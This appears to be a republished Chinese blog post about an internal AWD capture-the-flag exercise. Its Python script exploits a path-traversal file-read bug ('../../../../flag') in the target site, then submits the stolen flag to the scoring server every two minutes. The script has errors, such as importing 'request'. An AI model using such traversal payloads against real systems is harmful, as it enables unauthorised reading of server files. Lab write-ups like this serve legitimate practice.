記一次AWD自動獲取flag並提交


背景

近期部門內搭建了攻防實驗平台供大家練習,周末組織了一波AWD練習,之前都是做滲透測試比較多,加之題目比較簡單,找到漏洞getshell拿flag都沒問題,只不過如果沒找到突破口flag都要手動提交的話,拿分會慢很多。
在過程中發現其實除了getshell后在服務器根目錄/下讀到flag,其實靶機網站中還存在一個任意文件讀取漏洞,那這樣寫腳本自動flag就簡單得多了。

自動提交flag的腳本

#! /usr/bin/env python
# coding: utf-8

import os
import time
import request

url = "http://10.233.*.*:800/admin/Database/downFile.html?type=sql&file=../../../../../../../flag"

while True:
	flag = request.get(url,cookie={'skin':'0','PHPSESSID':'18kdkfhsdkfh3323'}).text
	print flag
	url2 = 'http://10.233.*.*:801/flag_file.php?token=team3&flag=%s' %flag
	submit = request.get(url2).text
	print submit
	time.sleep(60*2)    #flag兩分鍾更新一次

后記

只是想記錄一下,flag不一定需要getshell后才能拿到,所以寫自動提交flag的腳本也可以是多樣的


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM